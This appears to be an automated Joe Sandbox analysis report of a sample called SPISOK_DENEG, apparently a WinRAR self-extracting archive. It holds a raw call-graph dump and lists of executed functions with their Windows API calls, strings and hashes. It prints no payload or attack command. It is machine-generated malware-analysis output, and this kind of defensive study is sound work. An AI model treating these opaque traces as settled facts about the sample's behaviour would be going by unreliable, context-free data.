24853->24855 24856 e2297 86 API calls 24854->24856 24856->24855 24858 d17ff 24857->24858 24869 d185a __InternalCxxFrameHandler 24857->24869 24859 d1828 24858->24859 24870 d6c36 76 API calls __vswprintf_c_l 24858->24870 24861 d1887 24859->24861 24864 d1847 ___std_exception_copy 24859->24864 24863 f3e3e 22 API calls 24861->24863 24862 d181e 24871 d6ca7 75 API calls 24862->24871 24866 d188e 24863->24866 24864->24869 24872 d6ca7 75 API calls 24864->24872 24866->24869 24873 d6ca7 75 API calls 24866->24873 24869->24832 24870->24862 24871->24859 24872->24869 24873->24869 24875 dce4a __EH_prolog 24874->24875 24876 eeb38 8 API calls 24875->24876 24877 dce8d 24876->24877 24878 eeb38 8 API calls 24877->24878 24879 dceb1 24878->24879 24879->24840 24881 e4a80 __EH_prolog 24880->24881 24882 eeb38 8 API calls 24881->24882 24883 e4a9c 24882->24883 24884 d7b8b 24883->24884 24886 e0e46 80 API calls 24883->24886 24884->24845 24886->24884 24888 d828e __EH_prolog 24887->24888 24916 d13dc 24888->24916 24890 d82aa 24891 d82bb 24890->24891 25059 d9f42 24890->25059 24894 d82f2 24891->24894 24924 d1a04 24891->24924 25055 d1692 24894->25055 24897 d8389 24943 d8430 24897->24943 24901 d83e8 24951 d1f6d 24901->24951 24904 d83f3 24904->24894 24955 d3b2d 24904->24955 24967 d848e 24904->24967 24906 da56d 7 API calls 24907 d82ee 24906->24907 24907->24894 24907->24897 24907->24906 25063 dc0c5 CompareStringW _wcslen 24907->25063 24910 da582 24909->24910 24914 da5b0 24910->24914 25313 da69b 24910->25313 24912 da592 24913 da597 FindClose 24912->24913 24912->24914 24913->24914 24914->24846 24915->24849 24917 d13e1 __EH_prolog 24916->24917 24918 dce40 8 API calls 24917->24918 24919 d1419 24918->24919 24920 eeb38 8 API calls 24919->24920 24923 d1474 __cftof 24919->24923 24921 d1461 24920->24921 24922 db505 84 API calls 24921->24922 24921->24923 24922->24923 24923->24890 24925 d1a0e __EH_prolog 24924->24925 24933 d1b9b 24925->24933 24938 d1a61 24925->24938 25064 d13ba 24925->25064 24927 d1bc7 25067 d138b 74 API calls 24927->25067 24930 d3b2d 101 API calls 24934 d1c12 24930->24934 24931 d1bd4 24931->24930 24931->24933 24932 d1c5a 24932->24933 24937 d1c8d 24932->24937 25068 d138b 74 API calls 24932->25068 24933->24907 24934->24932 24936 d3b2d 101 API calls 24934->24936 24936->24934 24937->24933 24941 d9e80 79 API calls 24937->24941 24938->24927 24938->24931 24938->24933 24939 d3b2d 101 API calls 24940 d1cde 24939->24940 24940->24933 24940->24939 24941->24940 24942 d9e80 79 API calls 24942->24938 25086 dcf3d 24943->25086 24945 d8440 25090 e13d2 GetSystemTime SystemTimeToFileTime 24945->25090 24947 d83a3 24947->24901 24948 e1b66 24947->24948 25095 ede6b 24948->25095 24952 d1f72 __EH_prolog 24951->24952 24954 d1fa6 24952->24954 25103 d19af 24952->25103 24954->24904 24956 d3b3d 24955->24956 24957 d3b39 24955->24957 24966 d9e80 79 API calls 24956->24966 24957->24904 24958 d3b4f 24959 d3b78 24958->24959 24960 d3b6a 24958->24960 25236 d286b 101 API calls 3 library calls 24959->25236 24962 d3baa 24960->24962 25235 d32f7 89 API calls 2 library calls 24960->25235 24962->24904 24964 d3b76 24964->24962 25237 d20d7 74 API calls 24964->25237 24966->24958 24968 d8498 __EH_prolog 24967->24968 24971 d84d5 24968->24971 24978 d8513 24968->24978 25261 e8c8d 103 API calls 24968->25261 24970 d84f5 24972 d851c 24970->24972 24973 d84fa 24970->24973 24971->24970 24976 d857a 24971->24976 24971->24978 24972->24978 25263 e8c8d 103 API calls 24972->25263 24973->24978 25262 d7a0d 152 API calls 24973->25262 24976->24978 25238 d5d1a 24976->25238 24978->24904 24979 d8605 24979->24978 25244 d8167 24979->25244 24982 d8797 24983 da56d 7 API calls 24982->24983 24986 d8802 24982->24986 24983->24986 24985 dd051 82 API calls 24990 d885d 24985->24990 25250 d7c0d 24986->25250 24987 d8992 24988 d8a5f 24987->24988 24993 d89e1 24987->24993 24994 d8ab6 24988->24994 25005 d8a6a 24988->25005 24989 d898b 25266 d2021 74 API calls 24989->25266 24990->24978 24990->24985 24990->24987 24990->24989 25264 d8117 84 API calls 24990->25264 25265 d2021 74 API calls 24990->25265 24995 d8a4c 24993->24995 24997 da231 3 API calls 24993->24997 24999 d8b14 24993->24999 24994->24995 25269 d7fc0 97 API calls 24994->25269 24995->24999 25001 d8ab4 24995->25001 24996 d959a 80 API calls 24996->24978 25002 d8a19 24997->25002 25014 d8b82 24999->25014 25043 d9105 24999->25043 25270 d98bc 24999->25270 25000 d959a 80 API calls 25000->24978 25001->24996 25002->24995 25267 d92a3 97 API calls 25002->25267 25003 dab1a 8 API calls 25006 d8bd1 25003->25006 25005->25001 25268 d7db2 101 API calls 25005->25268 25009 dab1a 8 API calls 25006->25009 25024 d8be7 25009->25024 25012 d8b70 25274 d6e98 77 API calls 25012->25274 25014->25003 25015 d8cbc 25016 d8d18 25015->25016 25017 d8e40 25015->25017 25018 d8d8a 25016->25018 25021 d8d28 25016->25021 25019 d8e66 25017->25019 25020 d8e52 25017->25020 25040 d8d49 25017->25040 25028 d8167 19 API calls 25018->25028 25023 e3377 75 API calls 25019->25023 25022 d9215 123 API calls 25020->25022 25025 d8d6e 25021->25025 25032 d8d37 25021->25032 25022->25040 25026 d8e7f 25023->25026 25024->25015 25027 d8c93 25024->25027 25034 d981a 79 API calls 25024->25034 25025->25040 25277 d77b8 111 API calls 25025->25277 25280 e3020 123 API calls 25026->25280 25027->25015 25275 d9a3c 82 API calls 25027->25275 25031 d8dbd 25028->25031 25036 d8df5 25031->25036 25037 d8de6 25031->25037 25031->25040 25276 d2021 74 API calls 25032->25276 25034->25027 25279 d9155 93 API calls __EH_prolog 25036->25279 25278 d7542 85 API calls 25037->25278 25046 d8f85 25040->25046 25281 d2021 74 API calls 25040->25281 25042 d9090 25042->25043 25044 da4ed 3 API calls 25042->25044 25043->25000 25047 d90eb 25044->25047 25045 d903e 25256 d9da2 25045->25256 25046->25042 25046->25043 25046->25045 25282 d9f09 SetEndOfFile 25046->25282 25047->25043 25283 d2021 74 API calls 25047->25283 25050 d9085 25052 d9620 77 API calls 25050->25052 25052->25042 25053 d90fb 25284 d6dcb 76 API calls 25053->25284 25056 d16a4 25055->25056 25300 dcee1 25056->25300 25060 d9f59 25059->25060 25061 d9f63 25060->25061 25312 d6d0c 78 API calls 25060->25312 25061->24891 25063->24907 25069 d1732 25064->25069 25066 d13d6 25066->24942 25067->24933 25068->24937 25070 d1748 25069->25070 25081 d17a0 __InternalCxxFrameHandler 25069->25081 25071 d1771 25070->25071 25082 d6c36 76 API calls __vswprintf_c_l 25070->25082 25073 d17c7 25071->25073 25078 d178d ___std_exception_copy 25071->25078 25075 f3e3e 22 API calls 25073->25075 25074 d1767 25083 d6ca7 75 API calls 25074->25083 25077 d17ce 25075->25077 25077->25081 25085 d6ca7 75 API calls 25077->25085 25078->25081 25084 d6ca7 75 API calls 25078->25084 25081->25066 25082->25074 25083->25071 25084->25081 25085->25081 25087 dcf4d 25086->25087 25089 dcf54 25086->25089 25091 d981a 25087->25091 25089->24945 25090->24947 25092 d9833 25091->25092 25094 d9e80 79 API calls 25092->25094 25093 d9865 25093->25089 25094->25093 25096 ede78 25095->25096 25097 de617 53 API calls 25096->25097 25098 ede9b 25097->25098 25099 d4092 _swprintf 51 API calls 25098->25099 25100 edead 25099->25100 25101 ed4d4 16 API calls 25100->25101 25102 e1b7c 25101->25102 25102->24901 25104 d19bf 25103->25104 25105 d19bb 25103->25105 25108 d9e80 79 API calls 25104->25108 25105->24954 25106 d19d4 25109 d18f6 25106->25109 25108->25106 25110 d1908 25109->25110 25111 d1945 25109->25111 25112 d3b2d 101 API calls 25110->25112 25117 d3fa3 25111->25117 25115 d1928 25112->25115 25115->25105 25118 d3fac 25117->25118 25119 d3b2d 101 API calls 25118->25119 25121 d1966 25118->25121 25134 e0e08 25118->25134 25119->25118 25121->25115 25122 d1e50 25121->25122 25123 d1e5a __EH_prolog 25122->25123 25142 d3bba 25123->25142 25125 d1e84 25126 d1732 78 API calls 25125->25126 25129 d1f0b 25125->25129 25127 d1e9b 25126->25127 25170 d18a9 78 API calls 25127->25170 25129->25115 25130 d1eb3 25132 d1ebf _wcslen 25130->25132 25171 e1b84 MultiByteToWideChar 25130->25171 25172 d18a9 78 API calls 25132->25172 25135 e0e0f 25134->25135 25136 e0e2a 25135->25136 25140 d6c31 RaiseException _com_raise_error 25135->25140 25138 e0e3b SetThreadExecutionState 25136->25138 25141 d6c31 RaiseException _com_raise_error 25136->25141 25138->25118 25140->25136 25141->25138 25143 d3bc4 __EH_prolog 25142->25143 25144 d3bda 25143->25144 25145 d3bf6 25143->25145 25198 d138b 74 API calls 25144->25198 25147 d3e51 25145->25147 25150 d3c22 25145->25150 25215 d138b 74 API calls 25147->25215 25149 d3be5 25149->25125 25150->25149 25173 e3377 25150->25173 25152 d3ca3 25153 d3d2e 25152->25153 25169 d3c9a 25152->25169 25201 dd051 25152->25201 25183 dab1a 25153->25183 25154 d3c9f 25154->25152 25200 d20bd 78 API calls 25154->25200 25156 d3c8f 25199 d138b 74 API calls 25156->25199 25157 d3c71 25157->25152 25157->25154 25157->25156 25159 d3d41 25163 d3dd7 25159->25163 25164 d3dc7 25159->25164 25207 e3020 123 API calls 25163->25207 25187 d9215 25164->25187 25167 d3dd5 25167->25169 25208 d2021 74 API calls 25167->25208 25209 e2297 25169->25209 25170->25130 25171->25132 25172->25129 25174 e338c 25173->25174 25176 e3396 ___std_exception_copy 25173->25176 25216 d6ca7 75 API calls 25174->25216 25177 e341c 25176->25177 25178 e34c6 25176->25178 25179 e3440 __cftof 25176->25179 25217 e32aa 75 API calls 3 library calls 25177->25217 25218 f238d RaiseException 25178->25218 25179->25157 25182 e34f2 25184 dab28 25183->25184 25186 dab32 25183->25186 25185 eeb38 8 API calls 25184->25185 25185->25186 25186->25159 25188 d921f __EH_prolog 25187->25188 25219 d7c64 25188->25219 25191 d13ba 78 API calls 25192 d9231 25191->25192 25222 dd114 25192->25222 25194 d9243 25195 d928a 25194->25195 25197 dd114 118 API calls 25194->25197 25231 dd300 97 API calls __InternalCxxFrameHandler 25194->25231 25195->25167 25197->25194 25198->25149 25199->25169 25200->25152 25202 dd084 25201->25202 25203 dd072 25201->25203 25233 d603a 82 API calls 25202->25233 25232 d603a 82 API calls 25203->25232 25206 dd07c 25206->25153 25207->25167 25208->25169 25210 e22a1 25209->25210 25211 e22ba 25210->25211 25214 e22ce 25210->25214 25234 e0eed 86 API calls 25211->25234 25213 e22c1 25213->25214 25215->25149 25216->25176 25217->25179 25218->25182 25220 db146 GetVersionExW 25219->25220 25221 d7c69 25220->25221 25221->25191 25227 dd12a __InternalCxxFrameHandler 25222->25227 25223 dd29a 25224 dd2ce 25223->25224 25225 dd0cb 6 API calls 25223->25225 25226 e0e08 SetThreadExecutionState RaiseException 25224->25226 25225->25224 25229 dd291 25226->25229 25227->25223 25228 e8c8d 103 API calls 25227->25228 25227->25229 25230 dac05 91 API calls 25227->25230 25228->25227 25229->25194 25230->25227 25231->25194 25232->25206 25233->25206 25234->25213 25235->24964 25236->24964 25237->24962 25239 d5d2a 25238->25239 25285 d5c4b 25239->25285 25241 d5d5d 25243 d5d95 25241->25243 25290 db1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25241->25290 25243->24979 25245 d8186 25244->25245 25246 d8232 25245->25246 25297 dbe5e 19 API calls __InternalCxxFrameHandler 25245->25297 25296 e1fac CharUpperW 25246->25296 25249 d823b 25249->24982 25251 d7c22 25250->25251 25252 d7c5a 25251->25252 25298 d6e7a 74 API calls 25251->25298 25252->24990 25254 d7c52 25299 d138b 74 API calls 25254->25299 25257 d9db3 25256->25257 25260 d9dc2 25256->25260 25258 d9db9 FlushFileBuffers 25257->25258 25257->25260 25258->25260 25259 d9e3f SetFileTime 25259->25050 25260->25259 25261->24971 25262->24978 25263->24978 25264->24990 25265->24990 25266->24987 25267->24995 25268->25001 25269->24995 25271 d98c5 GetFileType 25270->25271 25272 d8b5a 25270->25272 25271->25272 25272->25014 25273 d2021 74 API calls 25272->25273 25273->25012 25274->25014 25275->25015 25276->25040 25277->25040 25278->25040 25279->25040 25280->25040 25281->25046 25282->25045 25283->25053 25284->25043 25291 d5b48 25285->25291 25287 d5c6c 25287->25241 25289 d5b48 2 API calls 25289->25287 25290->25241 25292 d5b52 25291->25292 25294 d5c3a 25292->25294 25295 db1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25292->25295 25294->25287 25294->25289 25295->25292 25296->25249 25297->25246 25298->25254 25299->25252 25301 dcef2 25300->25301 25306 da99e 25301->25306 25303 dcf24 25304 da99e 86 API calls 25303->25304 25305 dcf2f 25304->25305 25307 da9c1 25306->25307 25310 da9d5 25306->25310 25311 e0eed 86 API calls 25307->25311 25309 da9c8 25309->25310 25310->25303 25311->25309 25312->25061 25314 da6a8 25313->25314 25315 da727 FindNextFileW 25314->25315 25316 da6c1 FindFirstFileW 25314->25316 25317 da732 GetLastError 25315->25317 25323 da709 25315->25323 25318 da6d0 25316->25318 25316->25323 25317->25323 25319 dbb03 GetCurrentDirectoryW 25318->25319 25320 da6e0 25319->25320 25321 da6fe GetLastError 25320->25321 25322 da6e4 FindFirstFileW 25320->25322 25321->25323 25322->25321 25322->25323 25323->24912 25324->24750 25325->24753 25326->24753 25327->24756 25328->24763 25330 d9f42 78 API calls 25329->25330 25331 d1fe8 25330->25331 25332 d1a04 101 API calls 25331->25332 25334 d2005 25331->25334 25333 d1ff5 25332->25333 25333->25334 25336 d138b 74 API calls 25333->25336 25334->24772 25334->24773 25336->25334 25416 e94e0 GetClientRect 25442 e21e0 26 API calls std::bad_exception::bad_exception 25458 ef2e0 46 API calls __RTC_Initialize 25459 fbee0 GetCommandLineA GetCommandLineW 25417 f2cfb 38 API calls 4 library calls 25443 d95f0 80 API calls 25460 d5ef0 82 API calls 25360 f98f0 25368 fadaf 25360->25368 25363 f9904 25365 f990c 25366 f9919 25365->25366 25376 f9920 11 API calls 25365->25376 25369 fac98 __dosmaperr 5 API calls 25368->25369 25370 fadd6 25369->25370 25371 fadee TlsAlloc 25370->25371 25372 faddf 25370->25372 25371->25372 25373 efbbc _ValidateLocalCookies 5 API calls 25372->25373 25374 f98fa 25373->25374 25374->25363 25375 f9869 20 API calls 2 library calls 25374->25375 25375->25365 25376->25363 25377 fabf0 25379 fabfb 25377->25379 25378 faf0a 11 API calls 25378->25379 25379->25378 25380 fac24 25379->25380 25382 fac20 25379->25382 25383 fac50 DeleteCriticalSection 25380->25383 25383->25382 25419 f88f0 7 API calls ___scrt_uninitialize_crt 25445 efd4f 9 API calls 2 library calls

                                                            Executed Functions

                                                            Function 000EDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 000E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 000E087C
                                                              • Part of subcall function 000E0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000E088E
                                                              • Part of subcall function 000E0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000E08BF
                                                              • Part of subcall function 000EA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 000EA655
                                                              • Part of subcall function 000EAC16: OleInitialize.OLE32(00000000), ref: 000EAC2F
                                                              • Part of subcall function 000EAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000EAC66
                                                              • Part of subcall function 000EAC16: SHGetMalloc.SHELL32(00118438), ref: 000EAC70
                                                            • GetCommandLineW.KERNEL32 ref: 000EDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000EDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 000EDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 000EDFCE
                                                              • Part of subcall function 000EDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000EDBF4
                                                              • Part of subcall function 000EDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000EDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 000EDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0012EC90,00000800), ref: 000EDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0012EC90), ref: 000EDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 000EE009
                                                            • _swprintf.LIBCMT ref: 000EE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000EE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 000EE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 000EE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 000EE0C9
                                                            • Sleep.KERNEL32(?), ref: 000EE0F7
                                                            • DeleteObject.GDI32 ref: 000EE130
                                                            • DeleteObject.GDI32(?), ref: 000EE140
                                                            • CloseHandle.KERNEL32 ref: 000EE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-3743209390
                                                            • Opcode ID: 1a871d011bc1df42c8d6956a92f734efcbb79b64cfdada497b02bd8a606ffb0a
                                                            • Instruction ID: bcdb8d498bcd6a9ab6bfe654c95152d9fcfab2d6c0e513097fb603ab92655618
                                                            • Opcode Fuzzy Hash: 1a871d011bc1df42c8d6956a92f734efcbb79b64cfdada497b02bd8a606ffb0a
                                                            • Instruction Fuzzy Hash: 17613B71904385BFD320AB76ED49FAB77ECEB08700F04442AF945A29D2DBB499C4C761
                                                            Function 000EA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 812 ea6c2-ea6df FindResourceW 813 ea7db 812->813 814 ea6e5-ea6f6 SizeofResource 812->814 815 ea7dd-ea7e1 813->815 814->813 816 ea6fc-ea70b LoadResource 814->816 816->813 817 ea711-ea71c LockResource 816->817 817->813 818 ea722-ea737 GlobalAlloc 817->818 819 ea73d-ea746 GlobalLock 818->819 820 ea7d3-ea7d9 818->820 821 ea7cc-ea7cd GlobalFree 819->821 822 ea74c-ea76a call f0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 ea76c-ea78e call ea626 822->825 826 ea7c5-ea7c6 GlobalUnlock 822->826 825->826 831 ea790-ea798 825->831 826->821 832 ea79a-ea7ae GdipCreateHBITMAPFromBitmap 831->832 833 ea7b3-ea7c1 831->833 832->833 834 ea7b0 832->834 833->826 834->833
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000EB73D,00000066), ref: 000EA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000EB73D,00000066), ref: 000EA72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 000EA73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000EA762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 000EA7C6
                                                              • Part of subcall function 000EA626: GdipAlloc.GDIPLUS(00000010), ref: 000EA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000EA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 000EA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: 9edd0495b6bdf8133b58afa67d50ae4e2ac68abf9b5e0896fed66887700aa0ce
                                                            • Instruction ID: 566960ae3a95bb406616b5344e1f0f99a5a7ed7c689fc3462511838578c082ea
                                                            • Opcode Fuzzy Hash: 9edd0495b6bdf8133b58afa67d50ae4e2ac68abf9b5e0896fed66887700aa0ce
                                                            • Instruction Fuzzy Hash: 5A31A475604342AFC7109F22DC48D5BBFFDEF8E760B044518F99592A21EB71E9808A61
                                                            Function 000DA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1025 da69b-da6bf call eec50 1028 da727-da730 FindNextFileW 1025->1028 1029 da6c1-da6ce FindFirstFileW 1025->1029 1030 da742-da7ff call e0602 call dc310 call e15da * 3 1028->1030 1031 da732-da740 GetLastError 1028->1031 1029->1030 1032 da6d0-da6e2 call dbb03 1029->1032 1036 da804-da811 1030->1036 1033 da719-da722 1031->1033 1040 da6fe-da707 GetLastError 1032->1040 1041 da6e4-da6fc FindFirstFileW 1032->1041 1033->1036 1042 da709-da70c 1040->1042 1043 da717 1040->1043 1041->1030 1041->1040 1042->1043 1045 da70e-da711 1042->1045 1043->1033 1045->1043 1047 da713-da715 1045->1047 1047->1033
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6C4
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA728
                                                            • GetLastError.KERNEL32(?,?,?,?,000DA592,000000FF,?,?), ref: 000DA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: 279c5f420eb1ecd262118f49495e8f86a5308daf20c4c9c22e88013105c8f919
                                                            • Instruction ID: 75d8673fb674d85fab5f2bfc18995978042df52e9a4b81c2e093832c9f34b5f1
                                                            • Opcode Fuzzy Hash: 279c5f420eb1ecd262118f49495e8f86a5308daf20c4c9c22e88013105c8f919
                                                            • Instruction Fuzzy Hash: 57419172A00655AFCB25DF64CC84AEAB7B8FB49350F104196F56DE3200D774AE94CFA1
                                                            Function 000F7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002,00000000), ref: 000F7E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002,00000000), ref: 000F7E16
                                                            • ExitProcess.KERNEL32 ref: 000F7E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 595bae93e589ec4c892669aa15ba1e0d00062cb867914bc4a8ac44a12a9826db
                                                            • Instruction ID: 83b1b2c445b7cf353511005bb93764d75080e674ba1af71eacceb678c8071ecb
                                                            • Opcode Fuzzy Hash: 595bae93e589ec4c892669aa15ba1e0d00062cb867914bc4a8ac44a12a9826db
                                                            • Instruction Fuzzy Hash: E7E04F31000148ABCF016F10CD099997F69EB14341F104455F9698A932CB75DE92DA90
                                                            Function 000D848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 29606fa0749ee2426b096f6bff2b327ccfbff88cc4d8d1de908487aa9c6af47c
                                                            • Instruction ID: b93c9885af8cd32fd9a3feefbb3a1c43ce3f67b1038690e106dd9034f4eef60c
                                                            • Opcode Fuzzy Hash: 29606fa0749ee2426b096f6bff2b327ccfbff88cc4d8d1de908487aa9c6af47c
                                                            • Instruction Fuzzy Hash: 8E82DA71904345AEDF65DB64C895BFABBB9AF05300F0881BBE8499B343DB315A84CB71
